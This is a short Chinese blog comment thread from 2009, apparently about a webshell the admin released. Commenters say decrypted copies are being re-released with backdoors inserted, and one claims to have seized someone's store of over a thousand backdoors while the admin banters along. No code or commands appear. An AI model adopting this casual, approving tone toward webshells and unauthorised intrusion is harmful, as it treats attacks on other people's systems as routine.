回复来自 admin 的评论 admin 于 2009-10-24 03:16 PM 回复
哉也,我这个shell哪里发布解密的源码了?不是说了只发了加密的文档吗?
回复回复发现[2009-10-23 10:06 PM | del]
最近发现你解密公布原码,有人继续拿着这些解密后的原码插后门发布,,,汗!!



回复来自 admin 的评论 admin 于 2009-10-24 04:07 PM 回复
多谢你的建议
回复回复路过了[2009-10-23 03:42 PM | del]
昨天把他的后门库拿下了 也只有1千多个  呵呵。。。。早就觉得这有问题了
回复来自 admin 的评论 admin 于 2009-10-23 07:14 PM 回复
小子,路过都不留大号,太不够朋友了
回复回复博雅[2009-10-21 08:01 PM | del]
是比较强悍,
回复来自 admin 的评论 admin 于 2009-10-23 07:15 PM 回复
呵呵,小雅
发表评论
昵 称:
密 码: 游客发言不需要密码.
验证码: 验证码提示:单击自动获取验证码
内 容:
最多可输入,当前共,还可输入
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.